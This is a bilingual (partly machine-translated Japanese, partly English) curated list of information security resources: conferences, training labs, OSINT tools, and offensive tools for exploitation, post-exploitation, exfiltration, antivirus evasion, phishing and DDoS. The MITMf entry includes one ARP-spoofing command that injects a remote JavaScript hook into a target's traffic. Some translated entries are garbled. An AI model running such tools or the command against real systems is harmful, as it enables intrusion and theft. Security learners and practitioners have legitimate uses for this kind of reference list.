list-infosec-encyclopedia - 情報セキュリティ関連の素晴らしいリストやその他のリソースのリスト。

(A list of information security related awesome lists and other resources.)

Created at: 2018-07-12 09:27:08
Language: NULL

GoVanguard InfoSec Encyclopedia

これは、私たちが役に立つと感じたリソースと私たちが使用するツールの継続的な編集です。InfoSec を初めて使用する場合や、開始するためのリソースの集中リストをお探しの場合は、「InfoSec とサイバーセキュリティの概要」を参照してください

目次


リソース

情報セキュリティ認証

書物

ロックピッキングリソース

  • /r/lockpicking Subreddit - Subreddit はロックピッキングのスポーツに捧げられています。
  • Keypicking.com - ロックピッキングとロックスポーツの議論のための賑やかなオンラインフォーラム。
  • LockWiki - セキュリティ業界の初心者と専門家の両方のためのコミュニティ主導のリファレンス。
  • ロックピッキング法医学 - ウェブサイト「法医学錠前屋の科学と研究に捧げられた」。
  • Lockpicking101.com - 「ロックピッキングの楽しさと倫理的な趣味に捧げられた」最も長く運営されているオンラインコミュニティの1つ。
  • アメージングキングスロックピッキングページ - ロック、ツール、ピッキングテクニックに関する詳細なページがあるホビイストのウェブサイト。

ソーシャルエンジニアリングの記事

カンファレンス

  • (ISC)2セキュア・イベント・シリーズ
  • 44CONロンドン
  • 44コン
  • AFCEA防衛サイバーオペレーションシンポジウム
  • AppSec United States](OWASP National Conference)
  • AppSecUSA
  • 大西洋安全保障会議](AtlSecCon)
  • BSides
  • BSidesイベントシリーズ
  • バルコン
  • ブラックハット
  • ブラックハット アメリカ合衆国
  • ブルーコン
  • ティッカー
  • CISOエグゼクティブサミットシリーズ](招待制)
  • CSO50カンファレンス
  • カンセクウェスト
  • カロライナコン
  • サイバー脅威インテリジェンスサミット
  • デフ・コン
  • ディープセック
  • デフキャンプ
  • ダービーコン
  • ダービーコン8.0
  • エコパーティー
  • 第1回会議
  • FSec
  • ハックマイアミ
  • ティッカー
  • 希望
  • Hack.lu
  • ハック3rConの
  • ハッカーの停止 - オプションで認定固有のトレーニングを含む
  • IANS 情報セキュリティフォーラム
  • IAPP グローバルプライバシーサミット
  • セキュリティとプライバシーに関するIEEEシンポジウム
  • ISACAサイバーセキュリティネクサス
  • ISF年次世界会議
  • ISSA CISOエグゼクティブフォーラムシリーズ
  • ISSA国際会議
  • 火をつける
  • 潜入
  • インフォセック南西部
  • インフォセックワールド
  • インフォセキュリティヨーロッパ
  • インフォセキュリティヨーロッパ
  • 情報セキュリティ 北米
  • レイヤーワン
  • ヌルコン
  • ヌルコン会議
  • オープンセキュリティサミット
  • フリークニック
  • RSAカンファレンス アメリカ合衆国
  • SANS年次総会
  • SANSペンテスト年次会議
  • SANSセキュリティ年次会議
  • セキュインサイド
  • ソース: 年次会議
  • セクターカナダ
  • セキュア360会議
  • セキュアワールド
  • セクリテイ
  • セキュリティオペレーションサミット&トレーニング
  • シュムーコン
  • スカイドッグコン
  • サマーコン
  • スイスのサイバーストーム
  • トットコン
  • USENIXセキュリティシンポジウム
  • ウイルス速報会議
  • conINT
  • セキュア CISO

オンライン動画

無料オンラインコース

トレーニングリソース

ハッキングの参照とチートシート

トレーニングと練習演習

  • CPTEコースウェアキット - CPTE試験用の有料公式トレーニングキット。
  • くそ脆弱なWebアプリケーション(DVWA) - 意図的に脆弱なPHP / MySQLのWebアプリケーション。
  • Gruyere - Gruyere は、クロスサイトスクリプティングやクロスサイトリクエストフォージェリから、情報漏えい、サービス拒否、リモートコード実行に至るまで、複数のセキュリティバグがある Web アプリケーションです。
  • このサイトをハック - Webアプリケーションのセキュリティ演習。
  • ボックスをハック - Windows VMを搭載したオンラインペンテストラボ。
  • ハッカー101 CTF - ウェブアプリCTFスタイルの演習。
  • Mutillidae - Mutillidaeは、Webアプリケーションをハックできるように提供される無料のオープンソースWebアプリケーションです。XAMMPを使用して、Linux、Windows XP、Windows 7、Windows 10にインストールできます。
  • OSCP に似た Vulnhub VM - OSCP に似た意図的に脆弱な VM です。
  • OWASP Damn Vulnerable Web Sockets (DVWS) - クライアント/サーバー通信用の Web ソケットで動作する脆弱な Web アプリケーション。
  • OWASP Juice Shop - JavaScript ベースの意図的に安全でない Web アプリケーション。
  • OWASP NodeGoat - OWASP トップ 10 を学習するための Node.js Web アプリケーションが含まれています。
  • OWASP Railsgoat - OWASP Top 10 に続く脆弱なバージョンの Rails です。
  • OWASPセキュリティシェパード - Webおよびモバイルアプリケーションセキュリティトレーニングプラットフォーム。
  • OWASP WebGoat - WebGoatは、一般的で人気のあるオープンソースコンポーネントを使用するJavaベースのアプリケーションで一般的に見られる脆弱性のテストを可能にする安全でないアプリケーションです。
  • OWASPセキュリティ知識フレームワーク - OWASPセキュリティ知識フレームワークラボ演習は、書き込みを完備しています。
  • Over the Wire: Natas - Web アプリケーションの課題。
  • Rapid7 Metsploitable - Metasploitable は基本的に、VMware 仮想マシン (VMX) として利用可能な、箱に入った侵入テスト ラボです。
  • RopeyTasks - 意図的に脆弱な単純なWebアプリケーション。
  • XSS 演習 - Webapp クロスサイト スクリプティング (XSS) バグ探索演習。

有益なユーチューブチャンネル

イラストとプレゼンテーション

クリアネットエクスプロイトデータベース

素晴らしいマスターリスト

ナレッジベース

使用する OSINT ツール

一般的な OSINT ツール

  • 不正使用IPDB - ブラックリストに登録されたIPまたはドメインの検索エンジン。
  • AutoShun - 悪意のあるIPやその他のリソースのパブリックリポジトリ。
  • BadIP - オンラインブラックリスト検索。
  • バーコードリーダー - C#、VB、Java、C \ C ++、デルファイ、PHP、その他の言語でバーコードをデコードします。
  • ベラティ - OSINTのための伝統的なスイスアーミーナイフ。Belatiは、OSINTの目的のためにウェブサイトやその他のサービスから公開データと公開文書を収集するためのツールです。
  • バイナリ防衛IP禁止リスト - パブリックIPブラックリスト。
  • ブロックリスト Ipsets - パブリック IP ブラックリスト。
  • Censys - 毎日のZMapおよびZGrabスキャンを通じて、ホストおよびウェブサイト上のデータを収集します。
  • CloudFrunt - 誤って設定されたCloudFront ドメインを識別するためのツール。
  • 結合 - オープンソースの脅威インテリジェンスフィード収集ツール。
  • 不気味 - ジオロケーションOSINTツール。
  • Datasploit - ユーザー名、電子メールアドレス、およびドメインに対してさまざまなOSINT技術を実行するためのツール。
  • Dnsenum - ドメインからの DNS 情報を列挙し、ゾーン転送を試行し、ブルート フォース辞書スタイルの攻撃を実行してから、結果に対して逆引き参照を実行する Perl スクリプト。
  • Dnsmap - パッシブDNSネットワークマッパー。
  • Dnsrecon - DNS 列挙スクリプト。
  • Dnstracer - 特定のDNSサーバーがどこから情報を取得するかを決定し、DNSサーバーのチェーンをたどります。
  • Dork-cli - コマンドラインのGoogleのドークツール。
  • emagnet - 漏洩したデータベースを見つける自動ハッキングツール。
  • FindFrontableDomains - フロント可能ドメインを見つけるためのマルチスレッドツール。
  • GOSINT - 複数のモジュールと電報スクレーパーを備えたOSINTツール。
  • Github-dorks(Github-dorks) - githubリポジトリ/組織をスキャンして機密情報漏洩の可能性を検出するためのCLIツール。
  • GooDork - コマンドライングーグルドーキングツール。
  • グーグルハッキングデータベース - グーグルドークのデータベース。は、偵察に使用できます。
  • グレイノイズ - 「脅威対策インテリジェンス」 グレイノイズはインターネットのバックグラウンドノイズを特徴付けるため、ユーザーは実際に重要なことに集中できます。
  • InfoByIp - ドメインとIPの一括検索ツール。
  • 陰謀コア - 攻撃対象領域の検出のためのフレームワーク。
  • Machinae - 脅威インテリジェンスフィードを使用した多目的OSINTツール。
  • Maltego - Patervaのオープンソースインテリジェンスとフォレンジックのためのプロプライエタリなソフトウェア。
  • マルウェアドメインリスト - 悪意のあるURLを検索して共有します。
  • NetBootcamp OSINT Tools
  • OSINT フレームワーク
  • OpenRefine - 乱雑なデータを操作して改善するための無料&オープンソースのパワーツール。
  • Orbit - トランザクション履歴の再帰的なクロールで暗号ウォレット間の関係を描画します。
  • OsintStalker - Facebook と geolocation OSINT 用の Python スクリプト。
  • Outwit - オンラインソースからあらゆる種類のデータやメディアを検索、取得、整理します。
  • PaGoDo - パッシブで自動化されたGoogleドーキングツール。
  • パッシブDNSクライアント - いくつかのパッシブDNSプロバイダを照会するためのライブラリとクエリツール。
  • パッシベDNS - パッシブDNSセットアップで使用するためにすべてのDNSサーバー応答を記録するネットワークスニファー。
  • フォトン - OSINT用に設計されたクローラ。
  • パウン偵察 - グラフ理論によって強化されたターゲット偵察フレームワーク。
  • クイックコード - Python および R データ分析環境。
  • レイヴン - LinkedIn情報収集ツール。
  • Recon-ng - Python で書かれたフル機能の Web 偵察フレームワーク。
  • SecApps偵察 - 情報収集とターゲット偵察ツールとUI。
  • スパムコップ - IPベースのブラックリスト。
  • スパムハウス - オンラインブラックリスト検索。
  • スパイダーフット - Web UIとレポートの視覚化を備えたオープンソースのOSINT自動化ツール
  • ThreatCrowd - 脅威検索エンジン。
  • ThreatTracker - Python ベースの IOC トラッカー。
  • Vcsmap - パブリックバージョン管理システムで機密情報をスキャンするためのプラグインベースのツール。
  • XRay - XRay は、パブリック ネットワークからの偵察、マッピング、および OSINT 収集のためのツールです。
  • - Githubユーザーのメールアドレスを検索します。
  • malc0de DNSSinkhole - 過去 30 日間にマルウェアを配布していると識別されたドメインのリスト。
  • malc0de データベース - 検索可能なインシデントデータベース。
  • pygreynoise - Greynoise Python Library
  • sn0int - 半自動 OSINT フレームワークとパッケージマネージャ。
  • ハーベスター - 電子メール、サブドメイン、および人の名前ハーベスター。

暗号OSINT検索

政府記録検索

  • ブラックブック - 公開記録の出発点。
  • FOIA検索 - 政府情報要求ポータル。
  • PACER - 連邦裁判所の記録への一般公開。
  • 要約 - ペイサーの無料版。ChromeとFirefox用のブラウザ拡張機能が含まれています。
  • SSNバリデーター - 有効な社会保障番号を確認します。

全国検索エンジン

国別のローカライズされた検索エンジン。

メタ検索

あまり知られておらず、使用されている検索エンジン。

ビジュアル検索およびクラスタリング検索エンジン

複数のサイト(Google、Yahoo、Bing、Gooなど)を同時にスクレイピングして結果を返す検索エンジン。

  • Carrot2 *検索結果をトピックに整理します。
  • Yippy *一度に複数のソースを使用して検索

ドキュメントとスライドの検索

PDF、Word 文書、プレゼンテーションスライドなどにあるデータを検索します。

パステビン検索

  • Pastebin-Pastebinは、簡単に共有できるようにオンラインで任意のテキストを保存できるWebサイトです。

コード検索

ウェブサイトのソースコードから探す

  • NerdyData - ソースコードの検索エンジン。
  • SearchCode - 10以上のソースにわたる関数、API、ライブラリの実際の例を見つけるのに役立ちます。

リアルタイム検索、ソーシャルメディア検索、および一般的なソーシャルメディアツール

ツイッター検索

フェイスブック検索

インスタグラム検索

ピンタレスト検索

Reddit Search

reddit ユーザーまたは subreddit についてもっと知るのに役立つツール。

VKontakte Search

ロシアのソーシャルメディアサイトVKontakteでさまざまなOSINTを実行します。

ブログ検索

ユーザー名チェック

個人調査

メール検索/メールチェック

電話番号調査

  • 国立セルラーディレクトリ - 人々が携帯電話のルックアップを実行することによって、互いに研究し、再接続するのを助けるために作成されました。ルックアップ製品には、いつでもアクセスできる数十億のレコードと、毎日1時間、無料の検索が含まれます。
  • 電話の逆引き参照 - 電話キャリア、地域、サービス プロバイダー、およびスイッチ情報に関する詳細情報。
  • スパイダイヤラ - 携帯電話&所有者名検索のボイスメールを取得します。
  • Twilio - 電話番号のキャリアの種類、場所などを検索します。
  • 電話バリデーター - かなり正確な電話検索サービス、特にGoogle Voice番号に対して優れています。

企業調査

ドメインとIPの研究

Keywords Discovery and Research

Web History and Website Capture

Image Search

Image Analysis

Web Monitoring

Social Network Analysis

DNS Search And Enumeration

  • Amass - The amass tool searches Internet data sources, performs brute force subdomain enumeration, searches web archives, and uses machine learning to generate additional subdomain name guesses. DNS name resolution is performed across many public servers so the authoritative server will see the traffic coming from different locations. Written in Go.

Network Reconnaissance Tools

  • ACLight - Script for advanced discovery of sensitive Privileged Accounts - includes Shadow Admins.
  • BuiltWith - Technology lookup tool for websites.
  • CloudFail - Unmask server IP addresses hidden behind Cloudflare by searching old database records and detecting misconfigured DNS.
  • LdapMiner - Multiplatform LDAP enumeration utility.
  • Mass Scan - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
  • Netdiscover - Simple and quick network scanning tool.
  • Pentest-Tools - Online suite of various different pentest related tools.
  • Ruler - Tool for remotely interacting with Exchange servers.
  • Shodan - Database containing information on all accessible domains on the internet obtained from passive scanning.
  • Spyse - Web research services that scan the entire internet using OSINT, to simplify the investigation of infrastructure and attack surfaces.
  • Spyse.py - Python API wrapper and command-line client for the tools hosted on spyse.com.
  • Sublist3r - Subdomain enumeration tool for penetration testers.
  • ldapsearch - Linux command line utility for querying LDAP servers.
  • nmap - Free security scanner for network exploration & security audits.
  • pyShodan - Python 3 script for interacting with Shodan API (requires valid API key).
  • smbmap - Handy SMB enumeration tool.
  • xprobe2 - Open source operating system fingerprinting tool.
  • zmap - Open source network scanner that enables researchers to easily perform Internet-wide network studies.

Exploitation Enumeration And Data Recovery Tools

Penetration Testing OS Distributions

  • ArchStrike - Arch GNU/Linux repository for security professionals and enthusiasts.
  • AttifyOS - GNU/Linux distribution focused on tools useful during Internet of Things (IoT) security assessments.
  • BackBox - Ubuntu-based distribution for penetration tests and security assessments.
  • BlackArch - Arch GNU/Linux-based distribution for penetration testers and security researchers.
  • Buscador - GNU/Linux virtual machine that is pre-configured for online investigators.
  • Fedora Security Lab - Provides a safe test environment to work on security auditing, forensics, system rescue and teaching security testing methodologies.
  • Kali - GNU/Linux distribution designed for digital forensics and penetration testing.
  • Network Security Toolkit (NST) - Fedora-based bootable live operating system designed to provide easy access to best-of-breed open source network security applications.
  • Parrot Security OS - Distribution similar to Kali using the same repositories, but with additional features such as Tor and I2P integration.
  • The Pentesters Framework - Distro organized around the Penetration Testing Execution Standard (PTES), providing a curated collection of utilities that eliminates often unused toolchains.

Multi-paradigm Frameworks

  • Armitage - Java-based GUI front-end for the Metasploit Framework.
  • AutoSploit - Automated mass exploiter, which collects target by employing the Shodan.io API and programmatically chooses Metasploit exploit modules based on the Shodan query.
  • Faraday - Multiuser integrated pentesting environment for red teams performing cooperative penetration tests, security audits, and risk assessments.
  • Habu Hacking Toolkit - Unified set of tools spanning passive reconnaissance, network attacks, social media monitoring, and website fingerprinting.
  • Mad-Metasploit - Additional scripts for Metasploit.
  • Metasploit - Software for offensive security teams to help verify vulnerabilities and manage security assessments.
  • Mobile Security Framework (MobSF) - Automated mobile application pentesting framework capable of static analysis, dynamic analysis, malware analysis, and web API testing.
  • Pupy - Cross-platform (Windows, Linux, macOS, Android) remote administration and post-exploitation tool.
  • Rupture - Multipurpose tool capable of man-in-the-middle attacks, BREACH attacks and other compression-based crypto attacks.

Network Vulnerability Scanners

  • Nessus - Commercial network vulnerability scanner.
  • Nexpose - Commercial vulnerability and risk management assessment engine that integrates with Metasploit, sold by Rapid7.
  • OpenVAS - Open source implementation of the popular Nessus vulnerability assessment system.
  • Vuls - Agentless Linux/FreeBSD vulnerability scanner written in Go.

Web Vulnerability Scanners

  • ACSTIS - Automated client-side template injection (sandbox escape/bypass) detection for AngularJS.
  • Burp Suite - Commercial web vulnerability scanner, with limited community edition.
  • cms-explorer - Reveal the specific modules, plugins, components and themes that various websites powered by content management systems are running.
  • Netsparker Web Application Security Scanner - Commercial web application security scanner to automatically find many different types of security flaws.
  • Nikto - Noisy but fast black box web server and web application vulnerability scanner.
  • Observatory - Free online web scanning utility.
  • OWASP Zed Attack Proxy (ZAP) - Feature-rich, scriptable HTTP intercepting proxy and fuzzer for penetration testing web applications.
  • Security Headers - Free online utility for checking a website's HTTP headers for security vulnerabilities.
  • SQLmate - A friend of sqlmap that identifies sqli vulnerabilities based on a given dork and website (optional).
  • WPScan - Black box WordPress vulnerability scanner.

Web Exploitation

  • Browser Exploitation Framework (BeEF) - Command and control server for delivering exploits to commandeered Web browsers.
  • Commix - Automated all-in-one operating system command injection and exploitation tool.
  • Drupwn - Drupal web application exploitation tool.
  • EyeWitness - Tool to take screenshots of websites, provide some server header info, and identify default credentials if possible.
  • fimap - Find, prepare, audit, exploit and even Google automatically for LFI/RFI bugs.
  • FuzzDB - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
  • IIS-Shortname-Scanner - Command line tool to exploit the Windows IIS tilde information disclosure vulnerability.
  • Kadabra - Automatic LFI exploiter and scanner.
  • Kadimus - LFI scan and exploit tool.
  • LFISuite - A tool designed to exploit Local File Include vulnerabilities.
  • libformatstr - Python script designed to simplify format string exploits.
  • liffy - LFI exploitation tool.
  • lyncsmash - A collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations
  • NoSQLmap - Automatic NoSQL injection and database takeover tool.
  • SQLmap - Automated SQL injection and database takeover tool.
  • sqlninja - Automated SQL injection and database takeover tool.
  • sslstrip2 - SSLStrip version to defeat HSTS.
  • sslstrip - Demonstration of the HTTPS stripping attacks.
  • tplmap - Automatic server-side template injection and Web server takeover tool.
  • VHostScan - A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, aliases and dynamic default pages.
  • wafw00f - Identifies and fingerprints Web Application Firewall (WAF) products.
  • webscreenshot - A simple script to take screenshots from a list of websites.
  • weevely3 - Weaponized web shell.
  • Wordpress Exploit Framework - Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
  • WPSploit - Exploit WordPress-powered websites with Metasploit.

Network Tools

  • dnstwist - Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.
  • dsniff - Collection of tools for network auditing and pentesting.
  • enumdb - MySQL and MSSQL bruteforce utility
  • FireAway - Firewall audit and security bypass tool.
  • impacket - Collection of Python classes for working with network protocols.
  • Intercepter-NG - Multifunctional network toolkit.
  • kerbrute - A tool to perform Kerberos pre-auth bruteforcing.
  • Low Orbit Ion Cannon (LOIC) - Open source network stress testing tool.
  • Ncat - TCP/IP command line utility supporting multiple protocols.
  • netcut - ARP based utility for discovering and spoofing MAC addresses and enabling/disabling network connectivity on network devices.
  • Network-Tools.com - Website offering an interface to numerous basic network utilities like , , , and more.
    ping
    traceroute
    whois
  • patator - Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
  • pig - GNU/Linux packet crafting tool.
  • Praeda - Automated multi-function printer data harvester for gathering usable data during security assessments.
  • Printer Exploitation Toolkit (PRET) - Tool for printer security testing capable of IP and USB connectivity, fuzzing, and exploitation of PostScript, PJL, and PCL printer language features.
  • routersploit - Open source exploitation framework similar to Metasploit but dedicated to embedded devices.
  • scapy - Python-based interactive packet manipulation program & library.
  • Sockstress - TCP based DoS utility.
  • SPARTA - Graphical interface offering scriptable, configurable access to existing network infrastructure scanning and enumeration tools.
  • Spyse - Web research services that scan the entire internet using OSINT, to simplify the investigation of infrastructure and attack surfaces.
  • Spyse.py - Python API wrapper and command-line client for the tools hosted on spyse.com.
  • THC Hydra - Online password cracking tool with built-in support for many network protocols, including HTTP, SMB, FTP, telnet, ICQ, MySQL, LDAP, IMAP, VNC, and more.
  • UFONet - Layer 7 DDoS/DoS tool.
  • Zarp - Multipurpose network attack tool, both wired and wireless.

Protocol Analyzers and Sniffers

  • tcpdump/libpcap - Common packet analyzer that runs under the command line.
  • Wireshark - Widely-used graphical, cross-platform network protocol analyzer.
  • Yersinia - Packet and protocol analyzer with MITM capability.
  • Fiddler - Cross platform packet capturing tool for capturing HTTP/HTTPS traffic.
  • netsniff-ng - Swiss army knife for Linux network sniffing.
  • Dshell - Network forensic analysis framework.
  • Chaosreader - Universal TCP/UDP snarfing tool that dumps session data from various protocols.

Proxies and MITM Tools

  • BetterCAP - Modular, portable and easily extensible MITM framework.
  • dnschef - Highly configurable DNS proxy for pentesters.
  • Ettercap - Comprehensive, mature suite for machine-in-the-middle attacks.
  • evilgrade - Modular framework to take advantage of poor upgrade implementations by injecting fake updates.
  • mallory - HTTP/HTTPS proxy over SSH
  • MITMf - Multipurpose man-in-the-middle framework.
    • e.g.
      mitmf --arp --spoof -i eth0 --gateway 192.168.1.1 --targets 192.168.1.20 --inject --js-url http://192.168.1.137:3000/hook.js
  • mitmproxy - Interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.
  • Morpheus - Automated ettercap TCP/IP Hijacking tool.
  • Responder-Windows - Windows version of the above NBT-NS/LLMNR/MDNS poisoner.
  • Responder - Open source NBT-NS, LLMNR, and MDNS poisoner.
  • SSH MITM - Intercept SSH connections with a proxy; all plaintext passwords and sessions are logged to disk.

Wireless Network Tools

  • Aircrack-ng - Set of tools for auditing wireless networks.
  • BetterCAP - Wifi, Bluetooth LE, and HID reconnaissance and MITM attack framework, written in Go.
  • Fluxion - Suite of automated social engineering based WPA attacks.
  • Kismet - Wireless network discovery tool.
  • MANA Toolkit - Rogue AP and man-in-the-middle utility.
  • NetStumbler - WLAN scanning tool.
  • WiFi Pumpkin - All in one Wi-Fi exploitation and spoofing utility.
  • wifi-pickle - Fake access point attacks.
  • Wifite - Automated wireless attack tool.

Transport Layer Security Tools

  • tlssled - Comprehensive TLS/SSL testing suite.
  • SSLscan - Quick command line SSL/TLS analyzer.
  • SSLyze - Fast and comprehensive TLS/SSL configuration analyzer to help identify security mis-configurations.
  • SSL Labs - Online TLS/SSL testing suite for revealing supported TLS/SSL versions and ciphers.
  • crackpkcs12 - Multithreaded program to crack PKCS#12 files ( and extensions), such as TLS/SSL certificates.
    .p12
    .pfx
  • spoodle - Mass subdomain + POODLE vulnerability scanner.
  • SMTP TLS Checker - Online TLS/SSL testing suite for SMTP servers.

Cryptography

  • FeatherDuster - Analysis tool for discovering flaws in cryptography.
  • rsatool - Tool for calculating RSA and RSA-CRT parameters.
  • xortool - XOR cipher analysis tool.

Post-Exploitation

  • CrackMapExec - Multipurpose post-exploitation suite containing many plugins.
  • DBC2 - Multipurpose post-exploitation tool.
  • Empire - PowerShell based (Windows) and Python based (Linux/OS X) post-exploitation framework.
  • EvilOSX - macOS backdoor with docker support.
  • Fathomless - A collection of post-exploitation tools for both Linux and Windows systems.
  • FruityC2 - Open source, agent-based post-exploitation framework with a web UI for management.
  • Koadic - Windows post-exploitation rootkit, primarily utilizing Windows Script Host.
  • PlugBot - Can be installed onto an ARM device for Command & Control use and more.
  • Portia - Automated post-exploitation tool for lateral movement and privilege escalation.
  • ProcessHider - Post-exploitation tool for hiding processes.
  • Pupy - Open source cross-platform post-exploitation tool, mostly written in Python.
  • RemoteRecon - Post-exploitation utility making use of multiple agents to perform different tasks.
  • TheFatRat - Tool designed to generate remote access trojans (backdoors) with msfvenom.arch-project/) - Can be installed onto an ARM device for Command & Control use and more.
  • p0wnedShell - PowerShell based post-exploitation utility utilizing .NET.
  • poet - Simple but multipurpose post-exploitation tool.

Exfiltration Tools

  • Data Exfiltration Toolkit (DET) - Proof of concept to perform data exfiltration using either single or multiple channel(s) at the same time.
  • dnsteal - Fake DNS server for stealthily extracting files.
  • HTTPTunnel - Tunnel data over pure HTTP GET/POST requests.
  • Iodine - Tunnel IPv4 data through a DNS server; useful for exfiltration from networks where Internet access is firewalled, but DNS queries are allowed.
  • MailSniper - Search through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.).
  • mallory - HTTP/HTTPS proxy over SSH.
  • mimikatz - Credentials extraction tool for Windows operating system.
  • mimikittenz - Post-exploitation PowerShell tool for extracting data from process memory.
  • PANHunt - Search file systems for credit cards.
  • PassHunt - Search file systems for passwords.
  • ptunnel-ng - Tunnel IPv4 traffic through ICMP pings; slow but stealthy when normal IP exfiltration traffic is blocked.
  • pwnat - Punches holes in firewalls and NATs.
  • spYDyishai - Local Google credentials exfiltration tool, written in Python.
  • tgcd - Simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls.

Static Analyzers

  • Androbugs-Framework - Android program vulnerability analysis tool.
  • Androwarn - Android static code analysis tool.
  • APKinspector - Android APK analysis tool with GUI.
  • bandit - Security oriented static analyser for python code.
  • Brakeman - Static analysis security vulnerability scanner for Ruby on Rails applications.
  • Codebeat (open source) - Open source implementation of commercial static code analysis tool with GitHub integration.
  • Codelyzer - A set of tslint rules for static code analysis of Angular TypeScript projects. You can run the static code analyzer over web apps, NativeScript, Ionic, etc.
  • cppcheck - Extensible C/C++ static analyzer focused on finding bugs.
  • FindBugs - Free software static analyzer to look for bugs in Java code.
  • Icewater - 16,432 free Yara rules.
  • Joint Advanced Defense Assessment for Android Applications (JAADAS) - Multipurpose Android static analysis tool.
  • OWASP Dependency Check - Open source static analysis tool that enumerates dependencies used by Java and .NET software code (with experimental support for Python, Ruby, Node.js, C, and C++) and lists security vulnerabilities associated with the depedencies.
  • pefile - Static portable executable file inspector.
  • Progpilot - Static security analysis tool for PHP code.
  • Quick Android Review Kit (Qark) - Tool for finding security related Android application vulnerabilities.
  • ShellCheck - Static code analysis tool for shell script.
  • smalisca - Android static code analysis tool.
  • sobelow - Security-focused static analysis for the Phoenix Framework.
  • truffleHog - Git repo scanner.
  • Veracode - Commercial cloud platform for static code analysis, dynamic code analysis, dependency/plugin analysis, and more.
  • VisualCodeGrepper - Open source static code analysis tool with support for Java, C, C++, C#, PL/SQL, VB, and PHP. VisualCodeGrepper also conforms to OWASP best practices.
  • Yara - Static pattern analysis tool for malware researchers.

Dynamic Analyzers

  • AndroidHooker - Dynamic Android application analysis tool.
  • Androl4b - Android security virtual machine based on Ubuntu-MATE for reverse engineering and malware analysis.
  • Cheat Engine - Memory debugger and hex editor for running applications.
  • ConDroid - Android dynamic application analysis tool.
  • Cuckoo - Automated dynamic malware analysis tool.
  • DECAF - Dynamic code analysis tool.
  • droidbox - Dynamic malware analysis tool for Android, extension to DECAF.
  • drozer - Android platform dynamic vulnerability assessment tool.
  • idb - iOS app security analyzer.
  • Inspeckage - Dynamic Android package analysis tool.

Hex Editors

  • Cheat Engine - Memory debugger and hex editor for running applications.
  • Frhed - Binary file editor for Windows.
  • HexEdit.js - Browser-based hex editing.
  • Hexinator - World's finest (proprietary, commercial) Hex Editor.

File Format Analysis Tools

  • Hachoir - Python library to view and edit a binary stream as tree of fields and tools for metadata extraction.
  • Kaitai Struct - File formats and network protocols dissection language and web IDE, generating parsers in C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.
  • Veles - Binary data visualization and analysis tool.

Anti-Virus Evasion Tools

  • AntiVirus Evasion Tool (AVET) - Post-process exploits containing executable files targeted for Windows machines to avoid being recognized by antivirus software.
  • Hyperion - Runtime encryptor for 32-bit portable executables ("PE s").
    .exe
  • peCloak.py - Automates the process of hiding a malicious Windows executable from antivirus (AV) detection.
  • peCloakCapstone - Multi-platform fork of the peCloak.py automated malware antivirus evasion tool.
  • Shellter - Dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
  • SigThief - Stealing signatures to evade AV.
  • UniByAv - Simple obfuscator that takes raw shellcode and generates Anti-Virus friendly executables by using a brute-forcable, 32-bit XOR key.
  • Windows-SignedBinary - AV evasion tool for binary files.

Hash Cracking Tools

  • CeWL - Generates custom wordlists by spidering a target's website and collecting unique words.
  • CrackStation - Online password cracker.
  • Hashcat - Fast hash cracking utility with support for most known hashes as well as OpenCL and CUDA acceleration.
  • John the Ripper Jumbo edition - Community enhanced version of John the Ripper.
  • John the Ripper - Fast password cracker.
  • JWT Cracker - Simple HS256 JWT token brute force cracker.
  • Mentalist - Unique GUI based password wordlist generator compatible with CeWL and John the Ripper.
  • JPassword Recovery Tool - RAR bruteforce cracker. Formery named RAR Crack.

Windows Utilities

  • Bloodhound - Graphical Active Directory trust relationship explorer.
  • Commentator - PowerShell script for adding comments to MS Office documents, and these comments can contain code to be executed.
  • DeathStar - Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments.
  • Empire - Pure PowerShell post-exploitation agent.
  • Fibratus - Tool for exploration and tracing of the Windows kernel.
  • GetVulnerableGPO - PowerShell based utility for finding vulnerable GPOs.
  • Headstart - Lazy man's Windows privilege escalation tool utilizing PowerSploit.
  • Hyena - NetBIOS exploitation.
  • Luckystrike - PowerShell based utility for the creation of malicious Office macro documents.
  • Magic Unicorn - Shellcode generator for numerous attack vectors, including Microsoft Office macros, PowerShell, HTML applications (HTA), or (using fake certificates).
    certutil
  • Mimikatz - Credentials extraction tool for Windows operating system.
  • PowerSploit - PowerShell Post-Exploitation Framework.
  • PSKernel-Primitives - Exploiting primitives for PowerShell.
  • Redsnarf - Post-exploitation tool for retrieving password hashes and credentials from Windows workstations, servers, and domain controllers.
  • Rubeus - Rubeus is a C# toolset for raw Kerberos interaction and abuses.
  • Sysinternals Suite - The Sysinternals Troubleshooting Utilities.
  • Windows Credentials Editor - Inspect logon sessions and add, change, list, and delete associated credentials, including Kerberos tickets.
  • Windows Exploit Suggester - Suggests Windows exploits based on patch levels.

GNU Linux Utilities

  • Linus - Security auditing tool for Linux and macOS.
  • Linux Exploit Suggester - Heuristic reporting on potentially viable exploits for a given GNU/Linux system.
  • Mempodipper - Linux Kernel 2.6.39 < 3.2.2 local privilege escalation script.
  • vuls - Linux/FreeBSD agentless vulnerability scanner.

macOS Utilities

  • Bella - Bella is a pure python post-exploitation data mining tool & remote administration tool for macOS.
  • Linus - Security auditing tool for Linux and macOS.

Social Engineering Tools

  • Beelogger - Tool for generating keylooger.
  • Catphish - Tool for phishing and corporate espionage written in Ruby.
  • Evilginx - MITM attack framework used for phishing credentials and session cookies from any Web service
  • Gophish - Open-Source Phishing Framework
  • King Phisher - Phishing campaign toolkit used for creating and managing multiple simultaneous phishing attacks with custom email and server content.
  • Lucy Phishing Server - (commercial) tool to perform security awareness trainings for employees including custom phishing campaigns, malware attacks etc. Includes many useful attack templates as well as training materials to raise security awareness.
  • PhishingFrenzy - Phishing Frenzy is an Open Source Ruby on Rails application that is leveraged by penetration testers to manage email phishing campaigns.
  • SET - The Social-Engineer Toolkit from TrustedSec
  • wifiphisher - Automated phishing attacks against Wi-Fi networks
  • Canary Tokens - Generate tokens to automatically alert users when triggered.
